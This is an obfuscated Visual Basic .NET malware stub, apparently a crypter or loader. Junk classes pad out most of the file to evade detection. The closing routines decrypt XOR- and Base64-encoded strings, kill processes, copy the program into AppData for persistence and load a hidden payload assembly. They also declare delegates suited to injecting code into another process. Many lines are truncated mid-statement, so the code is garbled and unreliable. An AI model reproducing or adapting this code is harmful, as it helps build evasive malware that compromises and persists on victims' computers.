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Imports System

Imports System.IO
Imports System.Text
Imports System.Threading
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Windows.Forms
Imports Microsoft.VisualBasic
Imports System.Resources
<Assembly: Guid("f37e90e2-c386-4bf4-b894-41cf9484f72c")>
Module ah3s
Declare Function eyk1t Lib "dwmapi"() As UInteger
Delegate Sub i9(ByVal xnp As Boolean, ByVal t6k7r As Double, ByVal m2q8 As Date)
Declare Function grl7ru Lib "wlanapi"(ByVal xgytvm As SByte, ByVal uf As Double,
ByVal cl4b8 As Boolean) As Long
Dim thtihj As Date = Date.Now
Dim x45j As String = "IazDbW"
Sub pp0(ByVal wgn As Decimal)
Dim o2q5e As Boolean = False
Dim rtv As String = "(Un{E4Z"
If o2q5e Then
End If
Dim uc8vma As Boolean = True
For fvzk As ULong = 13 To 76
If uc8vma Then
Dim gt7ax As Boolean = True
If gt7ax Then
End If
End If
End Sub
Class lhtx
Sub bttc4(ByVal lypqbl As Decimal, ByVal arqi As Double, ByVal v18 As ULong, ByVal
yto As UShort)
For rqeks As UInteger = 13 To 27
For rf As Short = 6 To 35
End Sub
Function ret(ByVal pbr As UShort) As Integer
Dim g7q As Boolean = False
If g7q Then
End If
Dim yzb1 As ULong = 884996089
Dim q70tm As Byte = 97
Return 1370249615
End Function
Class ch72
Dim i3 As Decimal = Nothing
Class ww
Dim e2w As Byte
Class nzmwkm
Dim xq0s As UShort = 19555
Sub u6qvs(ByVal bg As UInteger, ByVal u8_ump As String, ByVal fsc61 As ULong, ByVal
q37a6 As Decimal, ByVal mvt As Boolean)
If False Then
Dim kmmbrd As Boolean = True
Dim hfu As Boolean = True
If hfu Then
End If
If kmmbrd Then
Dim zxilc7 As Boolean = True
If zxilc7 Then
End If
End If
For sz2ask As UInteger = 7 To 32
Dim nd29 As Boolean = True
If nd29 Then
End If
If True Then
End If
End If
For Each r3 As Char In "rKfA*`6)_2VV}K"
End Sub
Function v8() As String
Dim m377u4 As Boolean = True
If m377u4 Then
Dim so As Date = Nothing
Dim e8u As Boolean = True
If e8u Then
For jr As Double = 3 To 83
End If
Dim odw6w As UShort
End If
Dim v4pbi2 As ULong
Dim u5 As Long = -1775108
Return "rnH&m\Z(R"
End Function
End Class
Sub h1l(ByVal ew As Boolean, ByVal q2i8 As Long, ByVal ugp As Byte, ByVal jye As
Dim fx As Boolean = True
If fx Then
End If
For exc As Byte = 2 To 76
For fb7 As SByte = 19 To 71
Dim m0mkjw As String = "J_J\M>/_?1O&W,,"
Dim tn As Boolean = False
If tn Then
For uvy As Long = 12 To 97
For Each pj8oai As Char In "n~az[2"
Dim gb293i As Boolean = False
For khz7 As Single = 10 To 46
End If
End Sub
Function esi(ByVal v222i As ULong, ByVal ga As Double, ByVal a8ib_r As SByte) As
For Each ntepna As Char In "p%4@2BV;"
Dim hwllt0 As Single = 2258.26!
Dim d0lu As Single = 31863.865!
For ekkj As Byte = 11 To 73
Dim d0cpow As Integer = -745898584
Dim ryp2d As Boolean = True
If ryp2d Then
End If
For cx As Byte = 14 To 119
For d7 As Short = 5 To 107
Return 71
End Function
End Class
Class yrli8
Function id(ByVal i9otqp As Boolean, ByVal w87x As Single, ByVal re As Date, ByVal
nojc7 As Boolean, ByVal hx1nc As ULong) As Double
Dim hwcme As Boolean = False
For pco47 As Integer = 0 To 23
If hwcme Then
End If
For xw_mbw As Decimal = 4 To 63
For Each rmn As Char In "0973mSo0"
Dim c3vu8r As Boolean = False
If c3vu8r Then
End If
Dim y9 As Short = 0
Return 24201.3
End Function
Class ezv
Dim kmiy0 As Integer
Declare Sub nq1t8 Lib "ntdsapi"(ByVal msuil As Single, ByVal wr9m42 As UInteger)
Delegate Function l9a5ck(ByVal dfi As ULong) As Decimal
Dim c5hyl As Byte = 189
Class p5o
Class t34
Function v0k() As Byte
For ty As ULong = 7 To 109
Dim llu0kx As Short = 10477
For vg2 As Single = 20 To 69
For dsul As UInteger = 11 To 77
Dim m4l As UShort = 16164
For Each j1 As Char In "*`?p,2*N"
Dim p327 As Boolean = True
If p327 Then
If True Then
End If
End If
Dim ywx9g As Byte = 237
Return 178
End Function
Function oyd3s8(ByVal kd1lmx As Decimal, ByVal ar As Long, ByVal hc As UShort,
ByVal t1118 As Short) As UShort
Dim lsgfv As Boolean = True
If lsgfv Then
If True Then
For Each nb11_ As Char In "Pf:W^ ^"
For rgg As ULong = 16 To 127
Dim yh5c9 As Boolean = True
If yh5c9 Then
End If
End If
For Each m6w6 As Char In "U}"
For s79me As Single = 3 To 100
Dim rq As Decimal = -261431103
Dim s As Byte
End If
Return 21648
End Function
Sub iffv(ByVal rz As ULong, ByVal cy8se As UInteger, ByVal zoke As Decimal, ByVal
ta90er As Boolean)
For au8k As Single = 0 To 71
For Each u41 As Char In "a8IS=2"
For nt As UInteger = 1 To 21
If False Then
End If
For tmmh38 As Long = 4 To 118
Dim eza85 As Boolean
End Sub
Delegate Function x71qe(ByVal g6 As SByte, ByVal w0 As Date, ByVal pnmnsn As Byte,
ByVal u3aqyp As UShort, ByVal u_mg5 As Single) As Boolean
End Class
Sub zb28(ByVal b154i As Boolean, ByVal crk76b As Byte, ByVal qkw1 As Boolean)
For m2xj As Single = 2 To 52
For au As ULong = 20 To 65
If True Then
End If
Dim sac As Integer = 2127774456
End Sub
Function w5(ByVal axo As Single, ByVal pqt7ts As ULong, ByVal y5p As Boolean, ByVal
p13wkw As UShort) As Integer
For Each kyzpx As Char In "at?AgE.)r"
Return 0
End Function
Delegate Function n_epjc(ByVal sy3 As Decimal) As String
Delegate Sub mhtwh(ByVal vu4o As Boolean, ByVal suozu_ As Date, ByVal x2n7in As
Delegate Sub seamw(ByVal te0 As Short)
Dim zqm89 As Double = -15639.95
Dim q71 As Boolean = True
Dim otsvxp As UShort = 4366
End Class
Class phlt
Dim z2 As UShort = Nothing
Delegate Function b6gbza(ByVal yspe As SByte, ByVal qtw22 As Byte, ByVal p9xt4 As
UInteger, ByVal lnm As Decimal, ByVal ztc As Long) As Boolean
Class w4qp
Function rwg(ByVal ebbi As UInteger, ByVal q7iuth As Double, ByVal ujsx As ULong,
ByVal wc3 As Byte) As Date
Dim ejb As Boolean = True
If ejb Then
End If
For Each xbz58c As Char In "A#y?["
Return Date.Now
End Function
Delegate Sub qt6(ByVal nclkn1 As String, ByVal rg05u As ULong, ByVal v5f As ULong)
Function y6(ByVal zebq As Byte, ByVal ukh0st As Double, ByVal a7l As Long) As
Return True
End Function
Delegate Function a8c5(ByVal h5fp As ULong, ByVal od1_ As UShort, ByVal r5lc As
Long, ByVal nak As String, ByVal m_t As Long) As Double
Dim xk As Decimal
Declare Sub r0 Lib "unicows"(ByVal r3y0lr As Short)
End Class
Dim cw As SByte = 0
Class xg7fu
Function ecp(ByVal pa As Double, ByVal ppped As Date, ByVal ebbd5 As Integer, ByVal
umw3mo As String) As Boolean
Return False
End Function
Class ur
Function ikel5(ByVal n9_86 As Integer, ByVal p_ynv As String, ByVal co1 As
UInteger, ByVal f5q0mp As Integer, ByVal cjp As Date) As UInteger
Return 434701990
End Function
Declare Function ho Lib "avifil32"(ByVal xqpc_z As SByte, ByVal p4 As Double, ByVal
nhydxp As Single, ByVal tcf9h As Integer, ByVal nuobj As Decimal) As Byte
Function w9(ByVal vu1h7 As Decimal, ByVal qb4l As Double) As SByte
Return 96
End Function
Delegate Function phtcdv(ByVal b59v As Decimal, ByVal abi3i As Byte, ByVal we_m17
As ULong, ByVal eri19 As Boolean) As Long
Function a4j(ByVal ags96l As Byte, ByVal f6 As UShort) As Byte
Return Nothing
End Function
Dim mk9 As Double = -26276.8
Class m4aco
Dim tep0wg As Single = 17101.5155!
Dim pq As String = "YN._?!{.D"
Dim a3 As String = Nothing
Class u09xw
Dim dn0q As Decimal = 1690347556
Class fyb
Class rfk7r
Delegate Sub klz(ByVal n7 As Single, ByVal ba As Byte, ByVal s10sf As ULong, ByVal
uaz As String)
Class a2pln6
Class csmr
Dim z4vi As Long = -44423727
Sub c52jpr(ByVal to_ As String, ByVal b5fjv5 As Single)
End Sub
End Class
Delegate Function dq(ByVal nb As Short, ByVal x_8l As Date, ByVal giwj As Double,
ByVal mqcxaq As ULong) As Boolean
Function o77_2c() As Boolean
Return False
End Function
End Class
Class els
Dim vye As Single
Sub hj7ywk()
End Sub
End Class
Class mee9v
Declare Sub s7j Lib "powrprof"(ByVal ufl As ULong)
Function mfcj() As Double
Return -17624.19
End Function
Delegate Sub z4qhb()
Delegate Function gdqq(ByVal wp_vlw As Byte, ByVal fs As Double) As Date
Sub j73vs(ByVal svor0m As Long)
End Sub
Class zy
Function v0q(ByVal jambcg As SByte, ByVal es9380 As Long, ByVal skmbg As Single,
ByVal xhaj As Double) As String
Return "05&.dU;OM"
End Function
End Class
Function zmv(ByVal svcu1z As Long, ByVal nwkom As Boolean, ByVal m5bp As Boolean,
ByVal v_j As Short) As Decimal
Return -726884298
End Function
Class k7
Function hdx1(ByVal h8qqk As String, ByVal t2 As Short, ByVal d1i As String, ByVal
vnhsfm As SByte, ByVal x5 As ULong) As Double
Return -10193.8523
End Function
Class p8yz4
Declare Sub ct59y Lib "mpr"(ByVal c0hvvv As UInteger, ByVal hh4 As Byte, ByVal
pbp_bf As Decimal)
End Class
Function mpkm(ByVal du As ULong, ByVal yn As UInteger, ByVal uigri As SByte, ByVal
skwm3h As Short) As UInteger
Return 1318594432
End Function
End Class
End Class
Delegate Function hj2mw_(ByVal p3 As Date, ByVal rj As Double, ByVal tvwbp_ As
Short, ByVal fllj As SByte, ByVal xend7a As SByte) As Boolean
Sub w9_q_(ByVal lbi As Decimal, ByVal ut1nk3 As SByte, ByVal dc As Short, ByVal o06
As Date)
End Sub
Class xur1d7
Sub jzmr1m(ByVal m1d As UInteger, ByVal rim2 As SByte, ByVal h25u As UInteger,
ByVal e_fmc As Integer, ByVal rrsjx As Short)
End Sub
Delegate Function pi(ByVal cal3f As Date, ByVal gpx4 As Double, ByVal d6 As Byte)
As Byte
Dim f_46s As UInteger = 1178782606
Declare Function xze8qz Lib "httpapi"(ByVal s1cyfj As UInteger, ByVal o_gf7 As
String) As Single
Delegate Sub tuu(ByVal ri As Single, ByVal y2 As UShort, ByVal t4lu As ULong)
Dim nhzdw As Single = -32173.798!
Function b_4af(ByVal y_qjk1 As Short) As Byte
Return 90
End Function
Function yzv5(ByVal v5 As UShort, ByVal nr7l As Boolean, ByVal f_0 As Integer,
ByVal qhkag As Boolean, ByVal rm As ULong) As Short
Return 5056
End Function
End Class
Class jzd94
Function nbwa(ByVal zbi As ULong, ByVal n_ As Boolean, ByVal kvab As Single, ByVal
afc14 As Integer, ByVal qx As ULong) As SByte
Return -125
End Function
Sub t79510(ByVal jcfu79 As Byte, ByVal jhv_sq As UShort)
End Sub
Sub dyx(ByVal bpx As SByte, ByVal nj2ah As Long, ByVal ud40 As SByte, ByVal q9va2
As Boolean)
End Sub
Delegate Function pz() As Single
End Class
End Class
End Class
Declare Sub kasl_0 Lib "advapi32"()
Dim aa4t6 As Decimal = 1907201703
Class lem
Delegate Function lt35j(ByVal c4e0mq As Date) As Integer
Class txf05c
Class x5czxc
Declare Sub dbx_wo Lib "winscard"(ByVal jb As Double)
Sub xxm(ByVal f5h As Single, ByVal h87 As Decimal, ByVal vx7 As UInteger, ByVal vsi
As Decimal, ByVal md As Single)
End Sub
Declare Function zzpib6 Lib "crypt32"(ByVal vplbgf As SByte, ByVal sp As Single,
ByVal f_3l0f As Double) As Double
End Class
Function jcw(ByVal mupftq As Boolean, ByVal m_ As Single, ByVal yirqf As UShort,
ByVal mm0f As Long) As ULong
Return 2133708825
End Function
Delegate Function z_(ByVal il72 As SByte) As ULong
Function pcg5c(ByVal ms As Decimal, ByVal rt1a As ULong, ByVal bozei5 As Boolean,
ByVal o5zs As ULong) As ULong
Return 143788076
End Function
Dim hyxn As SByte = -69
Delegate Sub wy(ByVal u65 As Byte, ByVal l3 As Integer)
Delegate Sub upt1_l(ByVal gkzeo As Integer, ByVal y1 As Double, ByVal d1tgo As
UInteger, ByVal wbp As ULong, ByVal jlimo As Byte)
End Class
Class o8jhoz
Sub nzf226(ByVal rtbb As Integer, ByVal japmws As Double, ByVal lq7 As String,
ByVal o4c0 As Date)
End Sub
Delegate Sub yc(ByVal r1 As UInteger, ByVal bm3 As Double, ByVal u2hu As Long)
Class sg
Function iwnc0(ByVal kt8z As Double, ByVal m9 As Single, ByVal sam6_ As Boolean,
ByVal ju As UInteger) As String
Return "T=<pN:I"
End Function
Dim ccmill As Integer = 484940860
Sub l9(ByVal wazag As SByte, ByVal xpa As Boolean)
End Sub
Dim z6h As Single = -17658.5387!
End Class
Delegate Function kxtxc(ByVal f As Long, ByVal x23w6 As Double, ByVal cy4gcp As
String, ByVal tv8i7v As Single) As Long
End Class
Delegate Function xlew() As Double
Delegate Sub rqlamo(ByVal u7w As Decimal, ByVal jsng6 As Boolean)
Delegate Function rt1r9v() As Byte
Function zvj(ByVal f08j As UInteger, ByVal n As Long, ByVal vmoujc As String, ByVal
pqr As Boolean, ByVal bfms0 As Integer) As SByte
Return 126
End Function
Sub o34()
End Sub
Delegate Sub ttb(ByVal yn0w7 As Date, ByVal d2uv As ULong, ByVal t0ybnf As Boolean)
End Class
Class qoh
Class pwrdy
Declare Function mtdj2t Lib "rpcrt4"() As Single
Class o25
Sub aavxl(ByVal nopq3t As Date, ByVal tq2eh As Date, ByVal i95o As Byte, ByVal k_nv
As String)
End Sub
Sub cefh_z(ByVal f9w8a6 As UInteger, ByVal lc As Decimal)
End Sub
Sub ck(ByVal x30bna As Byte, ByVal ixs As UInteger, ByVal i As Integer, ByVal a As
Short, ByVal byg As Double)
End Sub
Function vi(ByVal htvloc As UShort, ByVal fg As Boolean, ByVal lz As Long, ByVal
odrwqy As Single) As SByte
Return 127
End Function
End Class
Declare Sub d34mb Lib "ws2_32"(ByVal pyh As Single, ByVal v7kkw As Boolean, ByVal
r7 As Boolean, ByVal vx87r As Boolean)
Delegate Sub qln_wy(ByVal l5u2 As Long, ByVal db4an_ As UInteger, ByVal n6s As
Boolean, ByVal a_u As Short, ByVal r8 As Double)
Delegate Sub va(ByVal j0czb As Long, ByVal kpv As String, ByVal v3x5m As ULong)
Class bx
Dim ucv1v As SByte = 77
Function lmugh(ByVal mcyc63 As ULong) As ULong
Return 0
End Function
Dim p9c As Date = Date.Now
End Class
Dim oeheg As Single
Class b2aa9y
Function z80d(ByVal iqqfq As UInteger) As ULong
Return 690523266
End Function
Dim a4o6 As Date
Dim pk5hxr As Long = 441044024
End Class
End Class
Class e9wd
Delegate Sub gml4(ByVal y8 As Date, ByVal ecurd As Decimal, ByVal vao As Short,
ByVal zr As Long, ByVal tlfu As UInteger)
Class r9b
Dim lmpp As String
End Class
Declare Sub jppk Lib "comctl32"(ByVal rqanvo As Byte)
Class on2y
Class xbx
Dim by1 As Byte
Function k6wx(ByVal if0k As Long, ByVal c8 As Long, ByVal ym As Long) As UShort
Return 20701
End Function
Delegate Sub j(ByVal jimewo As Date)
Delegate Function bd(ByVal lj4oe As ULong, ByVal mtqj6n As String, ByVal mi37rm As
Decimal) As Single
Sub oibf(ByVal nh As ULong, ByVal lh As UShort)
End Sub
Delegate Sub o9t(ByVal fmegda As Single)
Sub ii2()
End Sub
End Class
End Class
Dim gu6 As Double = -29896.25
End Class
Class gh
Dim mjy8k As String = "Bw@yHw-"
Class adrexc
Delegate Sub wry3(ByVal n9vi_l As UInteger, ByVal p As Double, ByVal c80822 As
Long, ByVal fcsx6e As Boolean)
Delegate Function kqc1a(ByVal qu3v As Single, ByVal xqv3 As Decimal, ByVal g1md As
Single) As Double
Function l6i7g2(ByVal doy As Long, ByVal qd As Long, ByVal d As Boolean) As Boolean
Return False
End Function
Class bancg
Class ad3cq
Delegate Function p7adb() As Byte
Class odk
Class fu
Class ay_5x
Declare Function xs9 Lib "advapi32"(ByVal qr As Double, ByVal l As Integer, ByVal
euchu6 As UShort, ByVal x7r As String, ByVal auscmk As String) As Boolean
Delegate Sub n8bc1(ByVal nshh As Short)
Declare Function xzn Lib "hid"(ByVal btby_r As Date, ByVal a4w As Boolean, ByVal
mre7 As Date) As Byte
End Class
Delegate Function nx(ByVal q As UInteger, ByVal e2 As UInteger, ByVal z1 As
Decimal, ByVal mqzydy As Integer) As Integer
Dim ef As Long = 2020174420
End Class
Sub mfv(ByVal mhj As Double, ByVal x6z68 As Date, ByVal x2p8a8 As Short)
End Sub
Dim ygyvw As SByte = -24
Declare Function qghc9 Lib "gsapi"(ByVal ro As UShort, ByVal o As Single) As Date
Dim h As Date
Class dpiw0j
Delegate Function b6() As Byte
Delegate Sub x(ByVal gamc As Long, ByVal b As String, ByVal ft9p As Boolean, ByVal
r_w__m As Short, ByVal ebj As Decimal)
End Class
Function ns1k(ByVal ir As Byte) As Single
Return Nothing
End Function
End Class
Delegate Function sje(ByVal vapyr As SByte, ByVal nlj As Short, ByVal c As String)
As Double
Function mn(ByVal e As SByte) As UInteger
Return Nothing
End Function
End Class
Delegate Function rs_(ByVal wecu1d As Short, ByVal w5uq7u As String, ByVal k As
Long) As Single
Class gfp
Function tz() As SByte
Return 0
End Function
Delegate Sub v53()
Dim g_ As ULong = 486140208
End Class
End Class
Class bgjig
Delegate Function wt3u_(ByVal m As UShort) As Long
Declare Sub hw Lib "mscorsn"(ByVal r As Date, ByVal rlezm As Decimal, ByVal zyjrsz
As Short, ByVal zutfyn As UShort)
Dim exg As ULong = 950923284
End Class
Class h80cn
Delegate Sub r0l95(ByVal z As Decimal, ByVal y4j8ct As UInteger, ByVal r_0zp As
Short, ByVal ux As SByte, ByVal ujb0 As Date)
Function ipz0(ByVal l5q As Single, ByVal qblk9 As SByte) As Integer
Return 1921832374
End Function
Dim k_l3oa As Byte = 44
Class lc6p
Class osad
Sub xaw(ByVal emyk7 As Long)
End Sub
Function v(ByVal ez2j3 As UShort, ByVal rzrz As Long, ByVal nl3 As String, ByVal
lqw23 As Integer) As UShort
Return 24144
End Function
Class r9e7wj
Delegate Function oz(ByVal en2wt As Date, ByVal kl1 As ULong, ByVal qw8 As String)
As Short
Delegate Function w(ByVal iw1yo As Integer, ByVal pz7t_b As SByte, ByVal mg As
String) As UShort
Delegate Sub dt7sr(ByVal jsc As Long)
Delegate Function vre0ae(ByVal gsqs_c As Decimal, ByVal ezmp As UShort) As UShort
Dim x_h As Boolean
Delegate Sub rmwa(ByVal ds As Integer, ByVal f9tdg As Long, ByVal ty0f As String,
ByVal dzki8 As Single, ByVal pt As String)
Dim brna4 As String
Dim birwlx As Byte = 8
Declare Sub d0 Lib "wininet"(ByVal f_4fs As Decimal, ByVal xce2 As Short)
End Class
Dim if9mi As SByte = -35
End Class
Function xx5i5t(ByVal sn3be As Integer, ByVal vhp As Decimal, ByVal gofzn As
Double, ByVal moz As Boolean) As SByte
Return 99
End Function
Class l62h
Dim u As Short = 28103
Class l1r
Declare Function djxvr Lib "shell32"(ByVal eak As Decimal, ByVal bwx5j As String,
ByVal qsfa As String) As Double
Sub h4j_s()
End Sub
Dim wn As Date = Date.Now
End Class
Declare Function abp76 Lib "dhcpsapi"(ByVal j_ir1 As Single, ByVal ua277x As
UShort, ByVal vfbjre As Long, ByVal b5v As Double) As Decimal
Class fja5i
Sub j4h8(ByVal ui42 As Integer, ByVal k9n As Integer, ByVal t As UShort, ByVal
evazu As SByte)
End Sub
Dim xev As Date = Date.Now
Delegate Sub j2fo(ByVal r0r925 As Long, ByVal m0dng7 As Integer, ByVal tt6 As Byte)
End Class
Function lnu2i(ByVal ffvb As UInteger, ByVal i_j As Date, ByVal eq21t As SByte,
ByVal iyj As SByte, ByVal zihke As Integer) As ULong
Return 0
End Function
Dim tedje As Short = 16583
Delegate Sub l3tke(ByVal ud1 As Decimal, ByVal on5 As Boolean, ByVal rctz55 As
Class y0
Dim mfm As Boolean = True
Class g8vki
Class n6o
Function lyodn() As SByte
Return 112
End Function
Sub rb8(ByVal xurc As Long, ByVal zxd As Decimal, ByVal uww As ULong, ByVal al3z5
As SByte)
End Sub
Class t2rs
Function ot(ByVal gcjm As Double, ByVal k3oqt As ULong, ByVal trkmj As SByte, ByVal
e7 As Boolean, ByVal b_a As String) As String
Return "Vt"
End Function
Class j06ww
Delegate Sub zlasd(ByVal mtf_ As Boolean)
Delegate Function xs(ByVal hv As Decimal, ByVal lj As Short) As Date
End Class
Class tx
Sub n6d2v(ByVal hvfz As Long, ByVal dxln As Decimal, ByVal vrmrt As String, ByVal
p_yx As Date)
End Sub
Function zyb3(ByVal jh As Integer, ByVal vvg942 As Short, ByVal zt As Integer) As
Return True
End Function
Sub es3l_j(ByVal brsm As Boolean)
End Sub
Class wl2__
End Class
End Class
Dim fhdx As UInteger = 2011239082
Function zby(ByVal bp0a As Single, ByVal osa As Decimal, ByVal atd7v As String) As
Return 593357764
End Function
End Class
End Class
Sub m98v(ByVal hwy As UInteger)
End Sub
Declare Sub dh Lib "winmm"(ByVal ll_ As ULong, ByVal yw As Short, ByVal txsa As
Single, ByVal pb0 As SByte)
Delegate Sub p2a_()
Sub gx_a4l(ByVal yn2ie6 As Byte, ByVal dixd As Integer, ByVal jzx_ As Integer,
ByVal zht97 As Double)
End Sub
Declare Function n7bz Lib "ole32"(ByVal gmpu9 As ULong) As ULong
Class jq517
End Class
Declare Function gmv72 Lib "gdiplus"(ByVal z7o As UShort, ByVal etj As Double) As
End Class
Delegate Sub x2urmu()
Delegate Function e_2(ByVal clqqk8 As ULong, ByVal kxrus As String, ByVal bl_ztp As
Integer, ByVal oph As String) As Boolean
Class i4j0
End Class
End Class
Class iza
End Class
End Class
End Class
Declare Function mvr Lib "dnsapi"(ByVal eqiodh As Byte, ByVal t_ As Boolean) As
Delegate Function z1fv(ByVal pmun0q As String, ByVal dqwo3 As Date, ByVal hrz As
ULong) As ULong
Dim x7n_y As UShort = 32679
Class g
End Class
Dim afem8g As SByte = -69
End Class
End Class
Sub cu_(ByVal nll As ULong, ByVal xm As ULong, ByVal x7 As ULong, ByVal uj68ma As
Double, ByVal qht As Short)
End Sub
End Class
Function pvrg(ByVal yqt2 As SByte, ByVal q2 As String, ByVal t19dpn As Short, ByVal
z9c As String, ByVal wg3m As SByte) As Integer
Return 1007814556
End Function
Declare Function y Lib "ole32"(ByVal uxy As Short) As Byte
Class sh
End Class
Delegate Sub hl8t(ByVal fda As Single, ByVal ua As Double, ByVal d0nz3f As Boolean,
ByVal rri96j As Long, ByVal tu7z8w As Decimal)
End Class
Dim l6lq As Double = 2827.118
Sub x7v6(ByVal fo32md As Short, ByVal bv As Double, ByVal p1qbq3 As Long)
End Sub
Dim v1d7 As Date
End Class
Class hzhomj
End Class
End Class
Sub yn3io(ByVal zkvq_ As Date, ByVal w0bl3 As UInteger)
End Sub
Dim ay As UInteger = 1788068225
End Class
Dim ohrc As SByte = 20
Class tt_1gb
End Class
Sub b5(ByVal bfrwf As UShort)
End Sub
Declare Sub gic Lib "glut32"(ByVal ogd As Short, ByVal zz7 As String)
End Class
End Class
Function qa0u(ByVal g48 As UShort, ByVal f0fwy As Long, ByVal qy As Date) As
Return 1991348292
End Function
End Class
Dim yykb1r As Date = Date.Now
Sub igy1(ByVal hg As Integer, ByVal mq3n62 As UInteger, ByVal hdqhwd As Long)
End Sub
Class qf083b
End Class
Function dgw(ByVal od6j03 As Integer, ByVal mvl As Integer, ByVal qg As SByte,
ByVal yso As Long) As Long
Return 391605895
End Function
End Class
End Class
Class q22v
End Class
Dim shh As ULong
Class lqz
End Class
End Class
Function la(ByVal hod As Date, ByVal kvau As SByte, ByVal zdg5 As Byte(), ByVal
s2_5 As Double, ByVal s32r_1 As SByte, ByVal d101 As Double) As Byte()
Dim thvlb As UShort = 0
Dim h_ As Byte() = New Byte(){122,253,178,133,255,4,69,250,175,212}
Dim zys As Integer = h_.Length
For z95k As Integer = 0 To zdg5.Length - 1
zdg5(z95k) = zdg5(z95k) Xor h_(z95k Mod zys)
Return zdg5
End Function
Function as4n(ByVal dnpy0 As String) As String
For hr25od As SByte = 3 To 44
Return Encoding.UTF8.GetString(la(Date.Now, 15, Convert.FromBase64String(dnpy0),
-5867.073, -121, 15842.592))
End Function
Sub a5AEs46()
On Error Resume Next
Dim c9XJ() As String = as4n("KZ/b4LxwN5bvlCyUwPGKZSna/5c6").Split(as4n("Og=="))
For So1d9GH As Integer = 0 To 2
For Each i7G8Rag0 As System.Diagnostics.Process In
End Sub
Sub g4()
On Error Resume Next
Dim Ak16 As String = as4n("JsyKq5p8IA==")
Dim Yk As String =
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) &
If Application.ExecutablePath = Yk & Ak16 Then Return
If Not Directory.Exists(Yk) Then
End If
If Not Application.ExecutablePath = Yk & Ak16 Then
File.Copy(Application.ExecutablePath, Yk & Ak16)
File.Delete(Yk & Ak16)
File.Copy(Application.ExecutablePath, Yk & Ak16)
End If
Dim k = CreateObject(as4n("DY7R95Z0MdTcvB+R3g=="))
o=") & Ak16, Yk & Ak16)
o=") & Ak16, Yk & Ak16)
End Sub
Function frx(ByVal duqxt As Byte(), ByVal w1 As Integer, ByVal z7lu As UShort,
ByVal u8c5vm As UInteger, ByVal d026 As Short) As Integer
For ajwjr As Byte = 16 To 85
For Each m1o2l As Char In "3;6["
For n6iq_ As Byte = 3 To 35
For l2defi As UInteger = 9 To 62
Dim s_mg As Long = -912970426
Return Drawing.Color.FromArgb(duqxt(w1 + 3), duqxt(w1 + 2), duqxt(w1 + 1),
End Function
Function uf4ak1(ByVal n5 As Byte, ByVal tp As Integer, ByVal n19 As Boolean, ByVal
s8 As Single, ByVal lq As Date, ByVal n18a As UShort) As Byte()
Dim ju45 As Boolean = True
Dim greegw As String = "%Tyq"
If ju45 Then
End If
Dim sbbp As Boolean = True
If sbbp Then
For bcm As SByte = 0 To 90
Dim ryj9 As Decimal = 620808515
End If
Dim luid As Boolean = False
If luid Then
Dim rw9a As Date
Dim qxmanq As Boolean = True
For cl4k8h As Double = 16 To 114
If qxmanq Then
End If
End If
Dim j3v As Drawing.Color = Drawing.Color.FromArgb(tp)
Return New Byte() {j3v.B, j3v.G, j3v.R, j3v.A}
End Function
<DllImport("kernel32.dll", EntryPoint:="GetModuleHandle")> _
Function wiai(ByVal ugc5ci As String) As IntPtr
End Function
<DllImport("kernel32.dll", EntryPoint:="GetProcAddress")> _
Function wiai(ByVal ugc5ci As IntPtr, ByVal v7rs As String) As IntPtr
End Function
Function wiai(Of ugc5ci)(ByVal kc As Integer, ByVal g9qk As Decimal, ByVal v7rs As
String, ByVal bk As Byte, ByVal r5t As Integer) As ugc5ci
For Each zbo7l_ As Char In "NjJ[s;"
Dim v51j As Boolean = True
For f1ibk As Byte = 16 To 116
If v51j Then
End If
For qk6g As Single = 15 To 44
Dim x_ As Boolean = True
If x_ Then
End If
For inam As Short = 5 To 33
ar(58))(0)), v7rs.Split(Convert.ToChar(58))(1)), GetType(ugc5ci)), Object), ugc5ci)
End Function
Delegate Function r8w5(ByVal eymqrw As String, ByVal td As String, ByVal dmfrj As
IntPtr, ByVal tbrj As IntPtr, ByVal lu As Boolean, ByVal lyww As Integer, ByVal
xu56 As IntPtr, ByVal so6q As String, ByVal rbp_ As Byte(), ByVal ggnuz As
IntPtr()) As Boolean
Delegate Function zb(ByVal eymqrw As IntPtr, ByVal td As UInteger()) As Boolean
Delegate Function ctegk(ByVal eymqrw As IntPtr, ByVal td As IntPtr, ByRef dmfrj As
IntPtr, ByVal tbrj As IntPtr, ByRef lu As IntPtr) As Boolean
Delegate Function mp(ByVal eymqrw As IntPtr, ByVal td As IntPtr) As UInteger
Delegate Function i18b(ByVal eymqrw As IntPtr, ByVal td As IntPtr, ByVal dmfrj As
IntPtr, ByVal tbrj As Integer, ByVal lu As Integer) As IntPtr
Delegate Function wv(ByVal eymqrw As IntPtr, ByVal td As IntPtr, ByVal dmfrj As
Byte(), ByVal tbrj As IntPtr, ByRef lu As IntPtr) As Boolean
Delegate Function w4(ByVal eymqrw As IntPtr) As Integer
Sub wwb(ByVal eymqrw As Object)
For Each oba7ey As Char In "70CH~"
Dim k95 As SByte = 36
Dim bbwx7 As Boolean = False
If bbwx7 Then
End If
Dim k_qzhi As Date = Date.Now
For Each dvr9 As Char In "&)i"
Dim x1a As MethodInfo = Assembly.Load(DirectCast(eymqrw, Byte())).EntryPoint
If x1a.GetParameters.Length = 0 Then x1a.Invoke(Nothing, Nothing) Else
x1a.Invoke(Nothing, New Object() {New String() {}})
End Sub
Sub eymqrw(ByVal eymqrw As Byte(), ByVal yq9v0 As UShort, ByVal c6jny As Date)
For nxaqy As Integer = 0 to 100
Dim dkbx As Byte = CByte(nxaqy)
If eymqrw(60) = 128 Then
Dim o3 As Short = 2302
Dim ywl3ir As New Threading.Thread(AddressOf wwb)
Dim but90x As Boolean = True
If but90x Then
End If
For bn As Byte = 0 To 20
For Each xeov20 As Char In "64~^"
For x9oy3 As Integer = bn To 30
If x9oy3 = 25 Then Exit For
Dim td As String = Assembly.GetEntryAssembly.Location
If Directory.Exists(Environment.SystemDirectory(0) &
as4n("QKHi95BjN5vC9DyU3uCMJG2Cl+JT")) Then
Dim k05sx As Integer
For Each dmfrj As String In Directory.GetDirectories(Environment.SystemDirectory(0)
& as4n("QKHl7JFgKo3ciDeU0feQdyqc2/o0uObZuXYkl8qjFY/Z"))
If dmfrj.ToLower.Contains(as4n("DM+ctdE=")) Then
td = dmfrj & as4n("Jp7E8Y1hNtTKrB8=")
Exit For
End If
End If
Dim o7uld8 As Byte() = New Byte(){0,1,2,3,4,5}
Dim tbrj As Integer() = New Integer() {1, 16, 2, 32, 4, 64, 4, 64}
Dim um7k As Boolean = True
If um7k Then
End If
